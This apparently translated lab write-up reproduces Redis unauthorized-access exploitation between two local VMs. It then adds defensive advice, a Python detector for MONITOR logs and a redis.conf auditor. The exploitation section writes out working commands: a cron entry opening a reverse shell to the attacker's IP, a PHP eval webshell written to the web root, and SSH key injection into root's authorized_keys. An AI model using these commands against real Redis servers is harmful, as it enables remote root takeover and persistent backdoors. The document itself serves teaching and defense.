Redis unauthorized access vulnerability recurrence
1. Introduction to Redis
Redis (Remote Dictionary Server) is an open source, log-type Key-Value database written in ANSI C. It supports networking, can run in memory or with persistence, and provides APIs for multiple languages.
- Redis is an open source NoSQL database written in C.
- Redis runs in memory and supports persistence (storage on disk). It uses key-value pair storage and is an indispensable part of current distributed architectures.
- The Redis server program is a single-process model.
- Several Redis processes can be started on one server at the same time. The actual processing speed of Redis depends entirely on the execution efficiency of the main process. If only one Redis process runs on the server, its processing capability drops to some extent when many clients access it at once; if several Redis processes are started on the same server, concurrent processing improves, but at the same time this puts a lot of pressure on the server's CPU. In other words, in a production environment the number of Redis processes to start must be decided according to actual needs.
2. Conditions for vulnerability generation:
- Redis is bound to 0.0.0.0:6379 with no firewall rules or other security policies preventing access from untrusted source IPs, so it is directly exposed to the public network.
- No password authentication is set (the default is empty), so anyone can log in to the Redis service remotely without a password.
3. Vulnerability hazards:
- Attackers can access internal data without authentication, which may lead to leakage of sensitive information. Hackers can also maliciously execute flushall to clear all data;
- An attacker can execute lua code through EVAL, or write a backdoor file (webshell) to the disk through the data backup function;
- In the most serious case, if Redis is running as root, the hacker can write the SSH public key file to the root account and log in to the victim server directly through SSH.
4. Environment deployment
Target machine (Ubuntu): 192.168.241.129
Attack machine (Kali): 192.168.241.128
On Ubuntu, download and install Redis
wget http://download.redis.io/releases/redis-6.2.7.tar.gz //a lower Redis version is easier to use
Unpack the archive and enter the redis directory. Since there is a Makefile, install it directly by compiling with make.
If "It's a good idea to run 'make test'" appears, the installation is successful.
Then enter the src directory and copy redis-server and redis-cli to the /usr/bin directory (so they can be started directly without entering the installation directory every time)
sudo cp redis-cli /usr/bin
sudo cp redis-server /usr/bin
Modify the configuration file redis.conf
Comment out bind 127.0.0.1 ::1 //commenting this out removes the restriction to local connections only
Set protected-mode to no //turns protected mode off
Then copy redis.conf to the /etc/ directory
sudo cp redis.conf /etc/
Start the Redis service using the configuration file in the /etc/ directory
sudo redis-server /etc/redis.conf //runs the redis-server service with root privileges
The output indicates successful startup.
The attack machine is set up in the same way as the target machine: Redis must be installed first, but there is no need to modify the configuration file. After installation, the vulnerability can be reproduced.
5. Vulnerability recurrence
Kali: check whether port 6379 on the target is open
nmap -p 6379 --script redis-info 192.168.241.129 //-p specifies the port to scan
On the attack machine, use the following command (run from the directory containing redis-cli) to log in to the Redis service remotely.
./redis-cli -h 192.168.241.129
redis-cli -h <target host IP address> -p <port number>
If Redis has no password configured (the default), you can connect directly to the target Redis server. Enter info to view version information.
You can view the Redis storage path:
CONFIG GET dir
config get dir //gets the path Redis uses for persistent file storage
config get dbfilename //gets the file name Redis uses for persistent file storage
config set dir xxxx //changes the path
config set dbfilename xxx //changes the file name
save //the save command manually persists the data in memory to disk
Start a listener first
nc -lvp 4444
1. Write a scheduled task to the target and get a reverse shell
set x "\n* * * * * bash -i >& /dev/tcp/192.168.241.128/4444 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
If save returns (error) ERR,
the redis-server service does not have root permissions.
In that case use
ps -ef | grep redis //find the redis process
then sudo kill -9 <pid> to kill Redis
and start it again with sudo.
2. Write a webshell
Conditions of use
- The target's Redis accepts unauthorized connections: redis-cli on the attack machine can connect, as shown in the picture above, without login verification.
- The target runs a web server and the web root path is known (for example from phpinfo or an error message path), and Redis has read, write, create, delete, modify and list permissions on that directory.
- We can set dir to a directory a and dbfilename to a file name b, then execute save or bgsave, and an arbitrary file is written at path a/b.
Ubuntu needs a PHP environment installed and set up.
The directory specified with dir must already exist, otherwise an error is reported.
config set dir /var/www/html //set the web directory
config set dbfilename webshell.php //set the backup file name
set shell "<?php @eval($_POST['shell']);?>" //set the value
It is better to write:
set shell "\r\n\r\n<?php @eval($_POST['shell']);?>\r\n\r\n"
or set shell "\r\n\r\n<?php phpinfo();?>\r\n\r\n"
save //save
You can see that webshell.php has been generated in that directory on Ubuntu.
You can see that the written phpinfo page can be accessed successfully.
3. Write an SSH public key to achieve SSH login
Conditions of use:
- root privileges
- SSH key login is enabled and the /etc/.ssh file exists
First generate the SSH key pair on the attack machine (the generated files are in .ssh)
On Kali, enter the /root/.ssh directory
ssh-keygen -t rsa //when prompted twice for input, just press Enter
Write the public key to a file and copy it to the src directory
(echo -e "\n"; cat id_rsa.pub; echo -e "\n") > 1.txt
cat 1.txt | redis-cli -h 192.168.241.129 -p 6379 -x set hack //write the contents of 1.txt as the value of the key hack
redis-cli -h 192.168.241.129 -p 6379 //connect to Redis
config set dir /root/.ssh //change the Redis backup path to the directory holding SSH public keys
config set dbfilename authorized_keys //set the backup file name of the uploaded public key to authorized_keys
save //save
exit //exit
Note: if there is no .ssh directory on Ubuntu, you need to install ssh
sudo apt-get install openssh-server //install ssh
/etc/init.d/ssh start //start the service
/etc/init.d/ssh restart //restart the service
sudo su //switch to root
ssh-keygen //generate a key; no passphrase needed, press Enter twice
After that, ll shows the .ssh directory directly; it is a hidden directory and cannot be seen with ls.
Log in using the following command
ssh -i id_rsa root@192.168.241.129
It is recommended to change the target machine to CentOS, otherwise the reverse shell fails.
It works on CentOS but not on Ubuntu, for the following reasons:
Files written by Redis have mode 644 by default, but Ubuntu requires the scheduled task file /var/spool/cron/crontabs/<username> to have mode 600 (-rw-------) before it will run, otherwise it reports the error (root) INSECURE MODE (mode 0600 expected); on CentOS the scheduled task file /var/spool/cron/<username> also runs with mode 644.
The RDB file Redis saves contains binary garbage, which causes an error on Ubuntu but not on CentOS.
Because the systems differ, the crontab file location also differs:
CentOS scheduled task files are in /var/spool/cron/<username>
Ubuntu scheduled task files are in /var/spool/cron/crontabs/<username>
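Every technique in this section leaves the same trace on the server: a CONFIG SET of dir or dbfilename followed by SAVE or BGSAVE. The following detector is an added example (not part of the original post) that runs that logic over Redis MONITOR output. It assumes the standard `redis-cli MONITOR` line format `<timestamp> [<db> <ip>:<port>] "CMD" "arg" ...`; the sample lines, the client addresses and the SENSITIVE_DIRS list are constructed for the example.

```python
"""Detect the dir/dbfilename/save abuse pattern in Redis MONITOR output.

Added example, not from the original post. It assumes the standard
redis-cli MONITOR line format: <timestamp> [<db> <ip>:<port>] "CMD" "arg" ...
"""
import re
import shlex

MONITOR_RE = re.compile(r'^(\S+) \[(\d+) ([^\]]+)\] (.*)$')

# Directories a legitimate RDB dump should never be redirected into (constructed list).
SENSITIVE_DIRS = ("/var/spool/cron", "/root/.ssh", "/home/", "/var/www", "/etc/")

# Constructed sample MONITOR output: one client redirecting the dump into the
# cron directory and saving, one client doing harmless work.
SAMPLE_MONITOR = """\
1700000000.100000 [0 192.168.241.128:40122] "CONFIG" "GET" "dir"
1700000000.200000 [0 192.168.241.128:40122] "SET" "x" "crontab-payload"
1700000000.300000 [0 192.168.241.128:40122] "CONFIG" "SET" "dir" "/var/spool/cron/"
1700000000.400000 [0 192.168.241.128:40122] "CONFIG" "SET" "dbfilename" "root"
1700000000.500000 [0 192.168.241.128:40122] "SAVE"
1700000001.000000 [0 10.0.0.5:51000] "GET" "session:abc"
1700000001.100000 [0 10.0.0.5:51000] "CONFIG" "SET" "dbfilename" "dump.rdb"
"""


def parse_monitor_line(line):
    """Split one MONITOR line into timestamp, client address, command and args."""
    m = MONITOR_RE.match(line)
    if not m:
        return None
    ts, _db, client, rest = m.groups()
    tokens = shlex.split(rest)  # MONITOR quotes every token, shlex unquotes them
    if not tokens:
        return None
    return {"ts": float(ts), "client": client,
            "cmd": tokens[0].upper(), "args": tokens[1:]}


def detect(lines):
    """Return a list of (client, reason) alerts.

    Per-client state remembers CONFIG SET dir / dbfilename so that a later
    SAVE or BGSAVE is reported together with the redirected path."""
    state = {}
    alerts = []
    for line in lines:
        ev = parse_monitor_line(line)
        if ev is None:
            continue
        st = state.setdefault(ev["client"], {"dir": None, "dbfilename": None})
        if ev["cmd"] == "CONFIG" and len(ev["args"]) >= 3 and ev["args"][0].upper() == "SET":
            key, val = ev["args"][1].lower(), ev["args"][2]
            if key == "dir":
                st["dir"] = val
                if val.startswith(SENSITIVE_DIRS):
                    alerts.append((ev["client"], f"CONFIG SET dir to sensitive path {val}"))
            elif key == "dbfilename":
                st["dbfilename"] = val
                if not val.endswith(".rdb"):
                    alerts.append((ev["client"], f"CONFIG SET dbfilename to non-RDB name {val}"))
        elif ev["cmd"] in ("SAVE", "BGSAVE") and (st["dir"] or st["dbfilename"]):
            alerts.append((ev["client"],
                           f"{ev['cmd']} after CONFIG SET dir={st['dir']} dbfilename={st['dbfilename']}"))
    return alerts


if __name__ == "__main__":
    for client, reason in detect(SAMPLE_MONITOR.splitlines()):
        print(f"[ALERT] {client}: {reason}")
```

Run against a live instance by piping `redis-cli MONITOR` into the script; the same state machine applies to the cron, webshell and authorized_keys variants because all three change dir and dbfilename before saving. MONITOR itself costs throughput, so on a busy server the equivalent check is better placed on the command log or on an ACL that denies CONFIG.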
6. Defense methods
1. Prohibit external access to the Redis service port;
2. Do not start the redis service with root privileges;
3. Configure a security group to restrict the IPs that can connect to the Redis server;
4. Set a password and enable the firewall.
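The deployment section above produced the vulnerable state by editing three settings in redis.conf (commenting out bind, setting protected-mode to no, leaving requirepass unset). The following auditor is an added example, not part of the original post: it parses a redis.conf and reports exactly those conditions, plus whether CONFIG has been renamed so dir and dbfilename cannot be changed at runtime. Both configuration samples are constructed; the passphrase is a placeholder.

```python
"""Audit a redis.conf for the exposure conditions described in this post.

Added example, not from the original post. Checks: bind commented out or
wildcard, protected-mode no, requirepass unset, CONFIG command still reachable.
"""

# Constructed sample: the weakened redis.conf from the deployment section.
WEAK_CONF = """\
# bind 127.0.0.1 ::1
protected-mode no
port 6379
# requirepass foobared
"""

# Constructed sample: a hardened configuration (placeholder passphrase).
HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass "long-random-passphrase-placeholder"
rename-command CONFIG ""
rename-command FLUSHALL ""
"""


def parse_conf(text):
    """Return {directive: value} for active (non-comment) lines.

    Later lines override earlier ones, except rename-command, which may appear
    several times and is accumulated into a list."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "rename-command":
            conf.setdefault(key, []).append(value)
        else:
            conf[key] = value
    return conf


def audit(text):
    """Return a list of finding strings; an empty list means no issue found."""
    conf = parse_conf(text)
    findings = []
    bind = conf.get("bind")
    if bind is None:
        findings.append("bind: not set (commented out), Redis listens on all interfaces")
    elif "0.0.0.0" in bind.split() or "*" in bind.split():
        findings.append(f"bind: listens on all interfaces ({bind})")
    if conf.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode: no")
    password = conf.get("requirepass", "").strip("\"'")
    if not password:
        findings.append("requirepass: not set, unauthenticated access allowed")
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("CONFIG command reachable: dir/dbfilename can be changed at runtime")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit(text) or ['no findings']}")
```

Point the script at `/etc/redis.conf` on a host to get the same checklist as section 6 in one run; on Redis 6 and later an ACL user without the `config` command is the cleaner alternative to rename-command, but the rename check still covers older deployments such as the one built above.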